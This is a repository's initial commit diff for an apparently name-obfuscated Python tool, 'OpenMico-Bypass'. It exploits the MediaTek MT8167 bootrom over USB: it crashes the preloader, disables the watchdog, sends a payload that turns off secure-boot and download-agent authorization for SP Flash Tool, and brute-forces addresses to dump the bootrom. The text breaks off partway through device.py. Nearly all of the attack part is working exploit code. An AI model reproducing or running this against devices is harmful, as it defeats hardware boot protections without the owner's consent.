Initial commit

Initial commit

OpenMico-Bypass/README.md

@@ -0,0 +1,20 @@
+## How to turn off SPFlash verification
+-----
+
+- If this is the first time you run this program on this computer:
+```
+1 Make sure you have installed'Python 3.6.X' or higher and ADDED TO THE PATH
+2 Make sure you have installed'python-pip3'
+3 Install pyusb, json5 with command 'pip install pyusb json5'
+4 Install UsbDK
+```
+- How to use
+```
+If you confirm that the above steps have been completed, then Run
+'python bypass.py' in Windows Powershell and 
+connect your powered off phone with volume+ button, 
+you should get "Protection disabled" at the end then start Smartphone Flash Tool, 
+(you need to re-run them after each operation is completed).
+```
+
+- Based on https://github.com/MTK-bypass/bypass_utility

OpenMico-Bypass/bypass.py

@@ -0,0 +1,193 @@
+#!/bin/python3
+from src .exploit import exploit #line:3
+from src .common import from_bytes ,to_bytes #line:4
+from src .config import Config #line:5
+from src .device import Device #line:6
+from src .logger import log #line:7
+from src .bruteforce import bruteforce #line:8
+import argparse #line:10
+import os #line:11
+DEFAULT_CONFIG ="default_config.json5"#line:13
+PAYLOAD_DIR ="payloads/"#line:14
+DEFAULT_PAYLOAD ="generic_dump_payload.bin"#line:15
+DEFAULT_DA_ADDRESS =0x200D00 #line:16
+def main ():#line:19
+    O00O000O0O00OO0OO =argparse .ArgumentParser ()#line:20
+    O00O000O0O00OO0OO .add_argument ("-c","--config",help ="Device config")#line:21
+    O00O000O0O00OO0OO .add_argument ("-t","--test",help ="Testmode",const ="0x9900",nargs ='?')#line:22
+    O00O000O0O00OO0OO .add_argument ("-w","--watchdog",help ="Watchdog address(in hex)")#line:23
+    O00O000O0O00OO0OO .add_argument ("-u","--uart",help ="UART base address(in hex)")#line:24
+    O00O000O0O00OO0OO .add_argument ("-v","--var_1",help ="var_1 value(in hex)")#line:25
+    O00O000O0O00OO0OO .add_argument ("-a","--payload_address",help ="payload_address value(in hex)")#line:26
+    O00O000O0O00OO0OO .add_argument ("-p","--payload",help ="Payload to use")#line:27
+    O00O000O0O00OO0OO .add_argument ("-f","--force",help ="Force exploit on insecure device",action ="store_true")#line:28
+    O00O000O0O00OO0OO .add_argument ("-n","--no_handshake",help ="Skip handshake",action ="store_true")#line:29
+    O00O000O0O00OO0OO .add_argument ("-m","--crash_method",help ="Method to use for crashing preloader (0, 1, 2)",type =int )#line:30
+    O00O000O0O00OO0OO .add_argument ("-k","--kamakiri",help ="Force use of kamakiri",action ="store_true")#line:31
+    OOO00O0000000O0O0 =O00O000O0O00OO0OO .parse_args ()#line:32
+    if OOO00O0000000O0O0 .config :#line:34
+        if not os .path .exists (OOO00O0000000O0O0 .config ):#line:35
+            raise RuntimeError ("Config file {} doesn't exist".format (OOO00O0000000O0O0 .config ))#line:36
+    elif not os .path .exists (DEFAULT_CONFIG ):#line:37
+        raise RuntimeError ("Default config is missing")#line:38
+    O0O0O00O0OOO0OOOO =Device ().find ()#line:40
+    O00O0OOOOO00O0O0O ,OOO0OOO0OOOO0000O ,O0O0O0000OOO000OO ,OOO0000O00OO000OO =get_device_info (O0O0O00O0OOO0OOOO ,OOO00O0000000O0O0 )#line:42
+    while O0O0O00O0OOO0OOOO .preloader :#line:44
+        O0O0O00O0OOO0OOOO =crash_preloader (O0O0O00O0OOO0OOOO ,O00O0OOOOO00O0O0O )#line:45
+        O00O0OOOOO00O0O0O ,OOO0OOO0OOOO0000O ,O0O0O0000OOO000OO ,OOO0000O00OO000OO =get_device_info (O0O0O00O0OOO0OOOO ,OOO00O0000000O0O0 )#line:46
+    log ("Disabling watchdog timer")#line:48
+    O0O0O00O0OOO0OOOO .write32 (O00O0OOOOO00O0O0O .watchdog_address ,0x22000064 )#line:49
+    if O0O0O00O0OOO0OOOO .libusb0 :#line:51
+        OOO00O0000000O0O0 .kamakiri =True #line:52
+    O00O0OO000O00OOOO ="bootrom_"+hex (OOO0000O00OO000OO )[2 :]+".bin"#line:54
+    if OOO00O0000000O0O0 .test and not OOO00O0000000O0O0 .kamakiri :#line:56
+        OOO000OOOOO0O0OOO =int (OOO00O0000000O0O0 .test ,16 )#line:57
+        O0O00OOO0OO00O0O0 =False #line:58
+        while not O0O00OOO0OO00O0O0 :#line:59
+            log ("Test mode, testing "+hex (OOO000OOOOO0O0OOO )+"...")#line:60
+            O0O00OOO0OO00O0O0 ,OOO000OOOOO0O0OOO =bruteforce (O0O0O00O0OOO0OOOO ,O00O0OOOOO00O0O0O ,OOO000OOOOO0O0OOO )#line:61
+            O0O0O00O0OOO0OOOO .dev .close ()#line:62
+            reconnect_message ()#line:63
+            O0O0O00O0OOO0OOOO =Device ().find (wait =True )#line:64
+            O0O0O00O0OOO0OOOO .handshake ()#line:65
+            while O0O0O00O0OOO0OOOO .preloader :#line:66
+                O0O0O00O0OOO0OOOO =crash_preloader (O0O0O00O0OOO0OOOO ,O00O0OOOOO00O0O0O )#line:67
+                O0O0O00O0OOO0OOOO .handshake ()#line:68
+        log ("Found "+hex (OOO000OOOOO0O0OOO )+", dumping bootrom to {}".format (O00O0OO000O00OOOO ))#line:69
+        open (O00O0OO000O00OOOO ,"wb").write (bruteforce (O0O0O00O0OOO0OOOO ,O00O0OOOOO00O0O0O ,OOO000OOOOO0O0OOO ,True ))#line:70
+        exit (0 )#line:71
+    if OOO0OOO0OOOO0000O or O0O0O0000OOO000OO or OOO00O0000000O0O0 .force :#line:73
+        log ("Disabling protection")#line:74
+        OO0O00O0O0O00OO00 =prepare_payload (O00O0OOOOO00O0O0O )#line:76
+        OO0O0OOOO0000OO0O =exploit (O0O0O00O0OOO0OOOO ,O00O0OOOOO00O0O0O ,OO0O00O0O0O00OO00 ,OOO00O0000000O0O0 )#line:78
+        if OOO00O0000000O0O0 .test :#line:79
+            while not OO0O0OOOO0000OO0O :#line:80
+                O0O0O00O0OOO0OOOO .dev .close ()#line:81
+                O00O0OOOOO00O0O0O .var_1 +=1 #line:82
+                log ("Test mode, testing "+hex (O00O0OOOOO00O0O0O .var_1 )+"...")#line:83
+                reconnect_message ()#line:84
+                O0O0O00O0OOO0OOOO =Device ().find (wait =True )#line:85
+                O0O0O00O0OOO0OOOO .handshake ()#line:86
+                while O0O0O00O0OOO0OOOO .preloader :#line:87
+                    O0O0O00O0OOO0OOOO =crash_preloader (O0O0O00O0OOO0OOOO ,O00O0OOOOO00O0O0O )#line:88
+                    O0O0O00O0OOO0OOOO .handshake ()#line:89
+                OO0O0OOOO0000OO0O =exploit (O0O0O00O0OOO0OOOO ,O00O0OOOOO00O0O0O ,OO0O00O0O0O00OO00 ,OOO00O0000000O0O0 )#line:90
+    else :#line:91
+        log ("Insecure device, sending payload using send_da")#line:92
+        if not OOO00O0000000O0O0 .payload :#line:94
+            O00O0OOOOO00O0O0O .payload =DEFAULT_PAYLOAD #line:95
+        if not OOO00O0000000O0O0 .payload_address :#line:96
+            O00O0OOOOO00O0O0O .payload_address =DEFAULT_DA_ADDRESS #line:97
+        OO0O00O0O0O00OO00 =prepare_payload (O00O0OOOOO00O0O0O )#line:99
+        OO0O00O0O0O00OO00 +=b'\x00'*0x100 #line:101
+        O0O0O00O0OOO0OOOO .send_da (O00O0OOOOO00O0O0O .payload_address ,len (OO0O00O0O0O00OO00 ),0x100 ,OO0O00O0O0O00OO00 )#line:103
+        O0O0O00O0OOO0OOOO .jump_da (O00O0OOOOO00O0O0O .payload_address )#line:104
+        OO0O0OOOO0000OO0O =O0O0O00O0OOO0OOOO .read (4 )#line:106
+    if OO0O0OOOO0000OO0O ==to_bytes (0xA1A2A3A4 ,4 ):#line:108
+        log ("Protection disabled")#line:109
+    elif OO0O0OOOO0000OO0O ==to_bytes (0xC1C2C3C4 ,4 ):#line:110
+        dump_brom (O0O0O00O0OOO0OOOO ,O00O0OO000O00OOOO )#line:111
+    elif OO0O0OOOO0000OO0O ==to_bytes (0x0000C1C2 ,4 )and O0O0O00O0OOO0OOOO .read (4 )==to_bytes (0xC1C2C3C4 ,4 ):#line:112
+        dump_brom (O0O0O00O0OOO0OOOO ,O00O0OO000O00OOOO ,True )#line:113
+    elif OO0O0OOOO0000OO0O !=b'':#line:114
+        raise RuntimeError ("Unexpected result {}".format (OO0O0OOOO0000OO0O .hex ()))#line:115
+    else :#line:116
+        log ("Payload did not reply")#line:117
+    O0O0O00O0OOO0OOOO .close ()#line:119
+def reconnect_message ():#line:121
+    print ("")#line:122
+    print ("Please reconnect device in bootrom mode")#line:123
+    print ("")#line:124
+def dump_brom (OOO000OO0O0000O0O ,O0O0OOOOO0O000000 ,word_mode =False ):#line:126
+    log ("Found send_dword, dumping bootrom to {}".format (O0O0OOOOO0O000000 ))#line:127
+    with open (O0O0OOOOO0O000000 ,"wb")as OO0O0OO0O0O0OOO00 :#line:129
+        if word_mode :#line:130
+            for OO0OOOOOOO0O00000 in range (0x20000 //4 ):#line:131
+                OOO000OO0O0000O0O .read (4 )#line:132
+                OO0O0OO0O0O0OOO00 .write (OOO000OO0O0000O0O .read (4 ))#line:133
+        else :#line:134
+            OO0O0OO0O0O0OOO00 .write (OOO000OO0O0000O0O .read (0x20000 ))#line:135
+def prepare_payload (O00OO00OOOO0OO0O0 ):#line:138
+    with open (PAYLOAD_DIR +O00OO00OOOO0OO0O0 .payload ,"rb")as OO0OO0OOOO0O0O000 :#line:139
+        OO0OO0OOOO0O0O000 =OO0OO0OOOO0O0O000 .read ()#line:140
+    OO0OO0OOOO0O0O000 =bytearray (OO0OO0OOOO0O0O000 )#line:143
+    if from_bytes (OO0OO0OOOO0O0O000 [-4 :],4 ,'<')==0x10007000 :#line:144
+        OO0OO0OOOO0O0O000 [-4 :]=to_bytes (O00OO00OOOO0OO0O0 .watchdog_address ,4 ,'<')#line:145
+    if from_bytes (OO0OO0OOOO0O0O000 [-8 :][:4 ],4 ,'<')==0x11002000 :#line:146
+        OO0OO0OOOO0O0O000 [-8 :]=to_bytes (O00OO00OOOO0OO0O0 .uart_base ,4 ,'<')+OO0OO0OOOO0O0O000 [-4 :]#line:147
+    OO0OO0OOOO0O0O000 =bytes (OO0OO0OOOO0O0O000 )#line:148
+    while len (OO0OO0OOOO0O0O000 )%4 !=0 :#line:150
+        OO0OO0OOOO0O0O000 +=to_bytes (0 )#line:151
+    return OO0OO0OOOO0O0O000 #line:153
+def get_device_info (O00000OOOO00O0OO0 ,OO0000O0000OOOO00 ):#line:156
+    if not OO0000O0000OOOO00 .no_handshake :#line:157
+        O00000OOOO00O0OO0 .handshake ()#line:158
+    O0O000000OO0O000O =O00000OOOO00O0OO0 .get_hw_code ()#line:160
+    O00OOO0OO00OO0O0O ,O0OO0OOO0OO0OO0O0 ,OO0O000OO0OOOOOOO =O00000OOOO00O0OO0 .get_hw_dict ()#line:161
+    O000O0OO0O0O00O0O ,O0O00O0OO0OO0O0O0 ,O0000000OO0OOO0OO =O00000OOOO00O0OO0 .get_target_config ()#line:162
+    if OO0000O0000OOOO00 .config :#line:164
+        O00O0000000O0OOOO =open (OO0000O0000OOOO00 .config )#line:165
+        O00O00OOO0OO00000 =Config ().from_file (O00O0000000O0OOOO ,O0O000000OO0O000O )#line:166
+        O00O0000000O0OOOO .close ()#line:167
+    else :#line:168
+        try :#line:169
+            O00O00OOO0OO00000 =Config ().default (O0O000000OO0O000O )#line:170
+        except NotImplementedError as OO0OO0OOO0OO0OOOO :#line:171
+            if OO0000O0000OOOO00 .test :#line:172
+                O00O00OOO0OO00000 =Config ()#line:173
+                log (OO0OO0OOO0OO0OOOO )#line:175
+            else :#line:176
+                raise OO0OO0OOO0OO0OOOO #line:177
+    if OO0000O0000OOOO00 .test :#line:179
+        O00O00OOO0OO00000 .payload =DEFAULT_PAYLOAD #line:180
+    if OO0000O0000OOOO00 .var_1 :#line:181
+        O00O00OOO0OO00000 .var_1 =int (OO0000O0000OOOO00 .var_1 ,16 )#line:182
+    if OO0000O0000OOOO00 .watchdog :#line:183
+        O00O00OOO0OO00000 .watchdog_address =int (OO0000O0000OOOO00 .watchdog ,16 )#line:184
+    if OO0000O0000OOOO00 .uart :#line:185
+        O00O00OOO0OO00000 .uart_base =int (OO0000O0000OOOO00 .uart ,16 )#line:186
+    if OO0000O0000OOOO00 .payload_address :#line:187
+        O00O00OOO0OO00000 .payload_address =int (OO0000O0000OOOO00 .payload_address ,16 )#line:188
+    if OO0000O0000OOOO00 .payload :#line:189
+        O00O00OOO0OO00000 .payload =OO0000O0000OOOO00 .payload #line:190
+    if OO0000O0000OOOO00 .crash_method :#line:191
+        O00O00OOO0OO00000 .crash_method =OO0000O0000OOOO00 .crash_method #line:192
+    if not os .path .exists (PAYLOAD_DIR +O00O00OOO0OO00000 .payload ):#line:195
+        raise RuntimeError ("Payload file {} doesn't exist".format (PAYLOAD_DIR +O00O00OOO0OO00000 .payload ))#line:196
+    print ()#line:198
+    log ("Reading device information...")#line:199
+    log ("Device hw code: {}".format (hex (O0O000000OO0O000O )))#line:200
+    if format (hex (O0O000000OO0O000O ))!="0x8167":#line:201
+    		log ("The connected device is not supported")#line:202
+    		sys .exit (1 )#line:203
+    log ("Device hw sub code: {}".format (hex (O00OOO0OO00OO0O0O )))#line:204
+    log ("Device hw version: {}".format (hex (O0OO0OOO0OO0OO0O0 )))#line:205
+    log ("Device sw version: {}".format (hex (OO0O000OO0OOOOOOO )))#line:206
+    log ("Device secure boot: {}".format (O000O0OO0O0O00O0O ))#line:207
+    log ("Device serial link authorization: {}".format (O0O00O0OO0OO0O0O0 ))#line:208
+    log ("Device download agent authorization: {}".format (O0000000OO0OOO0OO ))#line:209
+    print ()#line:210
+    return O00O00OOO0OO00000 ,O0O00O0OO0OO0O0O0 ,O0000000OO0OOO0OO ,O0O000000OO0O000O #line:212
+def crash_preloader (O0OOO0000O0OOO0OO ,OO0O00O0O000O0O0O ):#line:214
+    print ("")#line:215
+    log ("Found device in preloader mode, trying to crash...")#line:216
+    print ("")#line:217
+    if OO0O00O0O000O0O0O .crash_method ==0 :#line:218
+        try :#line:219
+            O00OOO000OOO0OO00 =b'\x00\x01\x9F\xE5\x10\xFF\x2F\xE1'+b'\x00'*0x110 #line:220
+            O0OOO0000O0OOO0OO .send_da (0 ,len (O00OOO000OOO0OO00 ),0 ,O00OOO000OOO0OO00 )#line:221
+            O0OOO0000O0OOO0OO .jump_da (0 )#line:222
+        except RuntimeError as OO000O00OOOOO00OO :#line:223
+            log (OO000O00OOOOO00OO )#line:224
+            print ("")#line:225
+    elif OO0O00O0O000O0O0O .crash_method ==1 :#line:226
+        O00OOO000OOO0OO00 =b'\x00'*0x100 #line:227
+        O0OOO0000O0OOO0OO .send_da (0 ,len (O00OOO000OOO0OO00 ),0x100 ,O00OOO000OOO0OO00 )#line:228
+        O0OOO0000O0OOO0OO .jump_da (0 )#line:229
+    elif OO0O00O0O000O0O0O .crash_method ==2 :#line:230
+        O0OOO0000O0OOO0OO .read32 (0 )#line:231
+    O0OOO0000O0OOO0OO .dev .close ()#line:233
+    O0OOO0000O0OOO0OO =Device ().find ()#line:235
+    return O0OOO0000O0OOO0OO #line:237
+if __name__ =="__main__":#line:240
+    main ()#line:241

OpenMico-Bypass/default_config.json5

@@ -0,0 +1,8 @@
+{
+    "0x8167": { // mt8516
+        "var_1": 0xCC,
+        "payload": "mt8167_payload.bin",
+        "ptr_usbdl": 0xd2e4,
+        "ptr_da": 0xd7ac,
+    },
+}

OpenMico-Bypass/src/bruteforce.py

@@ -0,0 +1,48 @@
+from src .common import to_bytes ,from_bytes #line:1
+import usb #line:3
+import array #line:4
+import struct #line:5
+def bruteforce (O0OOOOO00OOOO000O ,OO00OO0O000000O0O ,O00O00OOOOO0O0OO0 ,dump =False ):#line:7
+    O0000000O0O00O0O0 =OO00OO0O000000O0O .watchdog_address +0x50 #line:9
+    try :#line:13
+        O0OOOOO00OOOO000O .dev .timeout =1 #line:14
+    except Exception :#line:15
+        pass #line:16
+    OOO00OO0000O0O00O =O0OOOOO00OOOO000O .udev #line:18
+    try :#line:20
+        OOO00OO0000O0O00O ._ctx .managed_claim_interface =lambda *O0OOO0O0OOO0O00OO ,**O00O00000OOOO0O0O :None #line:22
+    except AttributeError as OOO0OO000OO0000O0 :#line:23
+        raise RuntimeError ("libusb is not installed for port {}".format (O0OOOOO00OOOO000O .dev .port ))from OOO0OO000OO0000O0 #line:24
+    OOOO0OO0O00OO00OO =OOO00OO0000O0O00O .ctrl_transfer (0xA1 ,0x21 ,0 ,0 ,7 )+array .array ('B',[0 ])#line:26
+    if dump :#line:28
+        try :#line:29
+            O0OOOOO00OOOO000O .cmd_da (0 ,0 ,1 )#line:30
+            O0OOOOO00OOOO000O .read32 (O0000000O0O00O0O0 )#line:31
+        except :#line:32
+            pass #line:33
+        for OO00OO0000O0000OO in range (4 ):#line:35
+            OOO00OO0000O0O00O .ctrl_transfer (0x21 ,0x20 ,0 ,0 ,OOOO0OO0O00OO00OO +array .array ('B',to_bytes (O00O00OOOOO0O0OO0 -6 +(4 -OO00OO0000O0000OO ),4 ,'<')))#line:36
+            OOO00OO0000O0O00O .ctrl_transfer (0x80 ,0x6 ,0x0200 ,0 ,9 )#line:37
+        OOO0O0O00O00OOOOO =bytearray (O0OOOOO00OOOO000O .cmd_da (0 ,0 ,0x20000 ))#line:39
+        OOO0O0O00O00OOOOO [O00O00OOOOO0O0OO0 -1 :]=b"\x00"+to_bytes (0x100030 ,4 ,'<')+OOO0O0O00O00OOOOO [O00O00OOOOO0O0OO0 +4 :]#line:40
+        return OOO0O0O00O00OOOOO #line:41
+    else :#line:43
+        try :#line:44
+            O0OOOOO00OOOO000O .cmd_da (0 ,0 ,1 )#line:45
+            O0OOOOO00OOOO000O .read32 (O0000000O0O00O0O0 )#line:46
+        except :#line:47
+            pass #line:48
+        for OOO0O0O0O0O0O000O in range (O00O00OOOOO0O0OO0 ,0xffff ,4 ):#line:50
+            for OO00OO0000O0000OO in range (3 ):#line:51
+                OOO00OO0000O0O00O .ctrl_transfer (0x21 ,0x20 ,0 ,0 ,OOOO0OO0O00OO00OO +array .array ('B',to_bytes (OOO0O0O0O0O0O000O -5 +(3 -OO00OO0000O0000OO ),4 ,'<')))#line:52
+                OOO00OO0000O0O00O .ctrl_transfer (0x80 ,0x6 ,0x0200 ,0 ,9 )#line:53
+            try :#line:54
+                if (len (O0OOOOO00OOOO000O .cmd_da (0 ,0 ,0x40 )))==0x40 :#line:55
+                    return (True ,OOO0O0O0O0O0O000O )#line:56
+            except RuntimeError :#line:57
+                try :#line:58
+                    O0OOOOO00OOOO000O .read32 (O0000000O0O00O0O0 )#line:59
+                except :#line:60
+                    return (False ,OOO0O0O0O0O0O000O +4 )#line:61
+            except Exception :#line:62
+                return (False ,OOO0O0O0O0O0O000O +4 )#line:63

OpenMico-Bypass/src/common.py

@@ -0,0 +1,7 @@
+import struct #line:1
+def raise_ (O0O0OOOOOO0OOOO00 ):#line:4
+    raise O0O0OOOOOO0OOOO00 #line:5
+def to_bytes (OO0O00O00O0OO0OO0 ,size =1 ,endian ='>'):#line:8
+    return {1 :lambda :struct .pack (endian +'B',OO0O00O00O0OO0OO0 ),2 :lambda :struct .pack (endian +'H',OO0O00O00O0OO0OO0 ),4 :lambda :struct .pack (endian +'I',OO0O00O00O0OO0OO0 )}.get (size ,lambda :raise_ (RuntimeError ("invalid size")))()#line:13
+def from_bytes (O0O00OO0O0000OOOO ,size =1 ,endian ='>'):#line:16
+    return {1 :lambda :struct .unpack (endian +'B',O0O00OO0O0000OOOO )[0 ],2 :lambda :struct .unpack (endian +'H',O0O00OO0O0000OOOO )[0 ],4 :lambda :struct .unpack (endian +'I',O0O00OO0O0000OOOO )[0 ]}.get (size ,lambda :raise_ (RuntimeError ("invalid size")))()#line:21

OpenMico-Bypass/src/config.py

@@ -0,0 +1,43 @@
+import json5 #line:1
+class Config :#line:4
+    watchdog_address :int =0x10007000 #line:5
+    uart_base :int =0x11002000 #line:6
+    payload_address :int =0x100A00 #line:7
+    var_0 :int =None #line:8
+    var_1 :int =0xA #line:9
+    payload :str #line:10
+    crash_method :int =0 #line:11
+    ptr_usbdl :int =None #line:12
+    ptr_da :int =None #line:13
+    def default (O00OO000000O000OO ,O0000O0O000OOOOO0 ):#line:15
+        O00OO0000OOO0O00O =open ("default_config.json5")#line:16
+        O00OO000000O000OO .from_file (O00OO0000OOO0O00O ,O0000O0O000OOOOO0 )#line:17
+        O00OO0000OOO0O00O .close ()#line:18
+        return O00OO000000O000OO #line:20
+    def from_file (OOOOO0OOOOOOO000O ,OOO0O0OO000O0O000 ,OO00OOOO0OOO0O000 ):#line:22
+        OO00OOOO0OOO0O000 =hex (OO00OOOO0OOO0O000 )#line:23
+        OOO0O0OO000O0O000 =json5 .load (OOO0O0OO000O0O000 )#line:25
+        if OO00OOOO0OOO0O000 in OOO0O0OO000O0O000 :#line:27
+            OOOOO0OOOOOOO000O .from_dict (OOO0O0OO000O0O000 [OO00OOOO0OOO0O000 ])#line:28
+        else :#line:29
+            raise NotImplementedError ("Can't find {} hw_code in config".format (OO00OOOO0OOO0O000 ))#line:30
+        return OOOOO0OOOOOOO000O #line:32
+    def from_dict (O0OO00OO000O0OOOO ,O0O000O0OO0OO00O0 ):#line:34
+        if "watchdog_address"in O0O000O0OO0OO00O0 :#line:35
+            O0OO00OO000O0OOOO .watchdog_address =O0O000O0OO0OO00O0 ["watchdog_address"]#line:36
+        if "uart_base"in O0O000O0OO0OO00O0 :#line:38
+            O0OO00OO000O0OOOO .uart_base =O0O000O0OO0OO00O0 ["uart_base"]#line:39
+        if "payload_address"in O0O000O0OO0OO00O0 :#line:41
+            O0OO00OO000O0OOOO .payload_address =O0O000O0OO0OO00O0 ["payload_address"]#line:42
+        if "var_0"in O0O000O0OO0OO00O0 :#line:44
+            O0OO00OO000O0OOOO .var_0 =O0O000O0OO0OO00O0 ["var_0"]#line:45
+        if "var_1"in O0O000O0OO0OO00O0 :#line:47
+            O0OO00OO000O0OOOO .var_1 =O0O000O0OO0OO00O0 ["var_1"]#line:48
+        if "crash_method"in O0O000O0OO0OO00O0 :#line:50
+            O0OO00OO000O0OOOO .crash_method =O0O000O0OO0OO00O0 ["crash_method"]#line:51
+        if "ptr_usbdl"in O0O000O0OO0OO00O0 :#line:53
+            O0OO00OO000O0OOOO .ptr_usbdl =O0O000O0OO0OO00O0 ["ptr_usbdl"]#line:54
+        if "ptr_da"in O0O000O0OO0OO00O0 :#line:56
+            O0OO00OO000O0OOOO .ptr_da =O0O000O0OO0OO00O0 ["ptr_da"]#line:57
+        O0OO00OO000O0OOOO .payload =O0O000O0OO0OO00O0 ["payload"]#line:59
+        return O0OO00OO000O0OOOO #line:61

OpenMico-Bypass/src/device.py

@@ -0,0 +1,271 @@
+from src .common import to_bytes ,from_bytes #line:1
+from src .logger import log #line:2
+import usb #line:3
+import usb .backend .libusb1 #line:4
+import usb .backend .libusb0 #line:5
+from ctypes import c_void_p ,c_int #line:6
+import array #line:7
+import os #line:8
+import time #line:10
+BAUD =115200 #line:12
+TIMEOUT =1 #line:13
+VID ="0E8D"#line:14
+PID ="0003"#line:15
+class Device :#line:18
+    def __init__ (O00OOO0OOOOOO00O0 ,port =None ):#line:19
+        O00OOO0OOOOOO00O0 .udev =None #line:20
+        O00OOO0OOOOOO00O0 .dev =None #line:21
+        O00OOO0OOOOOO00O0 .rxbuffer =array .array ('B')#line:22
+        O00OOO0OOOOOO00O0 .preloader =False #line:23
+        O00OOO0OOOOOO00O0 .timeout =TIMEOUT #line:24
+        O00OOO0OOOOOO00O0 .usbdk =False #line:25
+        O00OOO0OOOOOO00O0 .libusb0 =False #line:26
+        if os .name =='nt':#line:28
+            try :#line:29
+                O0000O00O000O0000 =os .path .join (os .path .abspath (os .path .dirname (__file__ )),"..")#line:30
+                try :#line:31
+                    os .add_dll_directory (O0000O00O000O0000 )#line:32
+                except Exception :#line:33
+                    pass #line:34
+                os .environ ['PATH']=O0000O00O000O0000 +';'+os .environ ['PATH']#line:35
+            except Exception :#line:36
+                pass #line:37
+    def find (O0OOO00OOO0OO0OO0 ,wait =False ):#line:39
+        if O0OOO00OOO0OO0OO0 .dev :#line:40
+            raise RuntimeError ("Device already found")#line:41
+        try :#line:43
+            O0OOO00OOO0OO0OO0 .backend =usb .backend .libusb1 .get_backend (find_library =lambda OO0OO00O00000OO0O :"libusb-1.0.dll")#line:44
+            if O0OOO00OOO0OO0OO0 .backend :#line:45
+                try :#line:46
+                    O0OOO00OOO0OO0OO0 .backend .lib .libusb_set_option .argtypes =[c_void_p ,c_int ]#line:47
+                    O0OOO00OOO0OO0OO0 .backend .lib .libusb_set_option (O0OOO00OOO0OO0OO0 .backend .ctx ,1 )#line:48
+                    O0OOO00OOO0OO0OO0 .usbdk =True #line:49
+                except ValueError :#line:50
+                    log ("Failed enabling UsbDk mode, please use 64-Bit Python and 64-Bit UsbDk")#line:51
+            else :#line:52
+                O0OOO00OOO0OO0OO0 .backend =usb .backend .libusb1 .get_backend ()#line:53
+        except usb .core .USBError :#line:54
+            O0OOO00OOO0OO0OO0 .backend =usb .backend .libusb1 .get_backend ()#line:55
+        log ("MediaTek MT8167 Generic Bypass by Yagami Ko")#line:57
+        log ("Waiting for device")#line:58
+        if wait :#line:59
+            O0OOO00OOO0OO0OO0 .udev =usb .core .find (idVendor =int (VID ,16 ),backend =O0OOO00OOO0OO0OO0 .backend )#line:60
+            while O0OOO00OOO0OO0OO0 .udev :#line:61
+                time .sleep (0.25 )#line:62
+                O0OOO00OOO0OO0OO0 .udev =usb .core .find (idVendor =int (VID ,16 ),backend =O0OOO00OOO0OO0OO0 .backend )#line:63
+        O0OOO00OOO0OO0OO0 .udev =None #line:64
+        while not O0OOO00OOO0OO0OO0 .udev :#line:65
+            O0OOO00OOO0OO0OO0 .udev =usb .core .find (idVendor =int (VID ,16 ),backend =O0OOO00OOO0OO0OO0 .backend )#line:66
+            if O0OOO00OOO0OO0OO0 .udev :#line:67
+                break #line:68
+            time .sleep (0.25 )#line:69
+        log ("Found device = {0:04x}:{1:04x}".format (O0OOO00OOO0OO0OO0 .udev .idVendor ,O0OOO00OOO0OO0OO0 .udev .idProduct ))#line:71
+        O0OOO00OOO0OO0OO0 .dev =O0OOO00OOO0OO0OO0 #line:72
+        try :#line:74
+            if O0OOO00OOO0OO0OO0 .udev .is_kernel_driver_active (0 ):#line:75
+                O0OOO00OOO0OO0OO0 .udev .detach_kernel_driver (0 )#line:76
+            if O0OOO00OOO0OO0OO0 .udev .is_kernel_driver_active (1 ):#line:78
+                O0OOO00OOO0OO0OO0 .udev .detach_kernel_driver (1 )#line:79
+        except (NotImplementedError ,usb .core .USBError ):#line:81
+            pass #line:82
+        try :#line:84
+            O0OOO00OOO0OO0OO0 .configuration =O0OOO00OOO0OO0OO0 .udev .get_active_configuration ()#line:85
+        except (usb .core .USBError ,NotImplementedError )as OO0O0OOO0OO0O0000 :#line:86
+            if type (OO0O0OOO0OO0O0000 )is usb .core .USBError and OO0O0OOO0OO0O0000 .errno ==13 or type (OO0O0OOO0OO0O0000 )is NotImplementedError :#line:87
+                log ("Failed to enable libusb1, is UsbDk installed?")#line:88
+                log ("Falling back to libusb0 (kamakiri only)")#line:89
+                O0OOO00OOO0OO0OO0 .backend =usb .backend .libusb0 .get_backend ()#line:90
+                O0OOO00OOO0OO0OO0 .udev =usb .core .find (idVendor =int (VID ,16 ),backend =O0OOO00OOO0OO0OO0 .backend )#line:91
+                O0OOO00OOO0OO0OO0 .libusb0 =True #line:92
+            try :#line:93
+                O0OOO00OOO0OO0OO0 .udev .set_configuration ()#line:94
+            except AttributeError :#line:95
+                log ("Failed to enable libusb0")#line:96
+                exit (1 )#line:97
+        if O0OOO00OOO0OO0OO0 .udev .idProduct !=int (PID ,16 ):#line:99
+            O0OOO00OOO0OO0OO0 .preloader =True #line:100
+        else :#line:101
+            try :#line:102
+                O0OOO00OOO0OO0OO0 .udev .set_configuration (1 )#line:103
+                usb .util .claim_interface (O0OOO00OOO0OO0OO0 .udev ,0 )#line:104
+                usb .util .claim_interface (O0OOO00OOO0OO0OO0 .udev ,1 )#line:105
+            except usb .core .USBError :#line:106
+                pass #line:107
+        OOO0OOOOO00OO0000 =usb .util .find_descriptor (O0OOO00OOO0OO0OO0 .udev .get_active_configuration (),bInterfaceClass =0xA )#line:109
+        O0OOO00OOO0OO0OO0 .ep_in =usb .util .find_descriptor (OOO0OOOOO00OO0000 ,custom_match =lambda OO0OO00O0000OO0O0 :usb .util .endpoint_direction (OO0OO00O0000OO0O0 .bEndpointAddress )==usb .util .ENDPOINT_IN )#line:110
+        O0OOO00OOO0OO0OO0 .ep_out =usb .util .find_descriptor (OOO0OOOOO00OO0000 ,custom_match =lambda OOOOOO00OOO0OO0OO :usb .util .endpoint_direction (OOOOOO00OOO0OO0OO .bEndpointAddress )==usb .util .ENDPOINT_OUT )#line:111
+        try :#line:113
+            O0OOO00OOO0OO0OO0 .udev .ctrl_transfer (0x21 ,0x20 ,0 ,0 ,array .array ('B',to_bytes (BAUD ,4 ,'<')+b"\x00\x00\x08"))#line:114
+        except usb .core .USBError :#line:115
+            pass #line:116
+        return O0OOO00OOO0OO0OO0 #line:118
+    @staticmethod #line:120
+    def check (O0O0OOOOO0OOO0000 ,O000O000O00OO0OO0 ):#line:121
+        if O0O0OOOOO0OOO0000 !=O000O000O00OO0OO0 :#line:122
+            if type (O0O0OOOOO0OOO0000 )==bytes :#line:123
+                O0O0OOOOO0OOO0000 ="0x"+O0O0OOOOO0OOO0000 .hex ()#line:124
+            else :#line:125
+                O0O0OOOOO0OOO0000 =hex (O0O0OOOOO0OOO0000 )#line:126
+            if type (O000O000O00OO0OO0 )==bytes :#line:128
+                O000O000O00OO0OO0 ="0x"+O000O000O00OO0OO0 .hex ()#line:129
+            else :#line:130
